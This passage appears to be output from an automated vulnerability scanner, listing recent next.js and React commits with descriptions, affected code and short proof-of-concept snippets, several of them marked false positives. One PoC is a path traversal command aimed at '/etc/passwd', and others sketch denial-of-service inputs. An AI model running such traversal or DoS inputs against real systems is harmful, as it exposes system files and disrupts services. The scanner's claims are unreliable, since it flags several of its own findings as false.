Commit: 2dd9b7cf76c31df5d7e26e5199e3c362c3e94f95
Author: Jimmy Lai
The code incorrectly checked for debugChannel existence instead of debugChannelReadable, causing the server to signal debug info availability even with write-only channels. This could cause clients to block indefinitely waiting for debug data that never arrives, resulting in a denial of service condition.
π View Affected Code & PoC
Affected Code
debugChannel !== undefined,
Proof of Concept
// Server-side: Pass a write-only debug channel (no readable side)
const { Writable } = require('stream');
const writeOnlyChannel = new Writable({ write() {} });
renderToPipeableStream(component, { debugChannel: writeOnlyChannel });
// Client will now block forever waiting for debug data that cannot be read
β οΈ MEDIUM FALSE POSITIVE Integer Division by Zero / Panic-based DoS
Feb 6, 2026, 08:03 PM β vercel/next.js
Commit: 6dfcffe1cfb375363674723182b1a5d5c2894ea9
Author: Niklas Mischkulnig
The code performed integer division without checking for division by zero, which could cause a panic and crash the application. The patch replaces direct division with checked_div() to handle zero divisors safely.
π View Affected Code & PoC
Affected Code
if max_chunk_count_per_group != 0 {
chunks_to_merge_size / max_chunk_count_per_group
} else {
unreachable!();
}
Proof of Concept
Set max_chunk_count_per_group to 0 through configuration or input parameters. When make_production_chunks() is called with this configuration, the division chunks_to_merge_size / max_chunk_count_per_group will cause a panic, crashing the Turbopack bundler and causing a denial of service.
β οΈ MEDIUM FALSE POSITIVE Denial of Service (Stack Overflow)
Feb 4, 2026, 06:43 PM β facebook/react
Commit: cf993fb457417e0f20535b1fd42c3f45df966583
Author: Hendrik Liebau
The recursive traversal of async node chains in visitAsyncNode causes stack overflow when processing deep async sequences. Database libraries creating long linear chains of async operations can trigger this DoS condition. The patch converts recursive traversal to iterative to prevent stack exhaustion.
π View Affected Code & PoC
Affected Code
function visitAsyncNode(...) {
if (visited.has(node)) {
return visited.get(node);
}
visited.set(node, null);
const result = visitAsyncNodeImpl(request, task, node, visited, cutOff);
Proof of Concept
// Create a deep chain of async sequences (10000+ levels)
let current = null;
for (let i = 0; i < 10000; i++) {
current = { previous: current, end: -1 };
}
// This deep chain will cause stack overflow in visitAsyncNode
// when React Flight processes the async node traversal
β οΈ MEDIUM FALSE POSITIVE Path Traversal
Feb 4, 2026, 03:12 AM β facebook/react
Commit: 3ce1316b05968d2a8cffe42a110f2726f2c44c3e
Author: Joseph Savona
The code had improper path resolution that allowed attackers to access files outside the intended directory structure. The patch fixes relative path resolution by properly normalizing paths relative to PROJECT_ROOT instead of allowing arbitrary relative paths from the current working directory.
π View Affected Code & PoC
Affected Code
const inputPath = path.isAbsolute(opts.path) ? opts.path : path.resolve(process.cwd(), opts.path);
Proof of Concept
yarn snap compile ../../../etc/passwd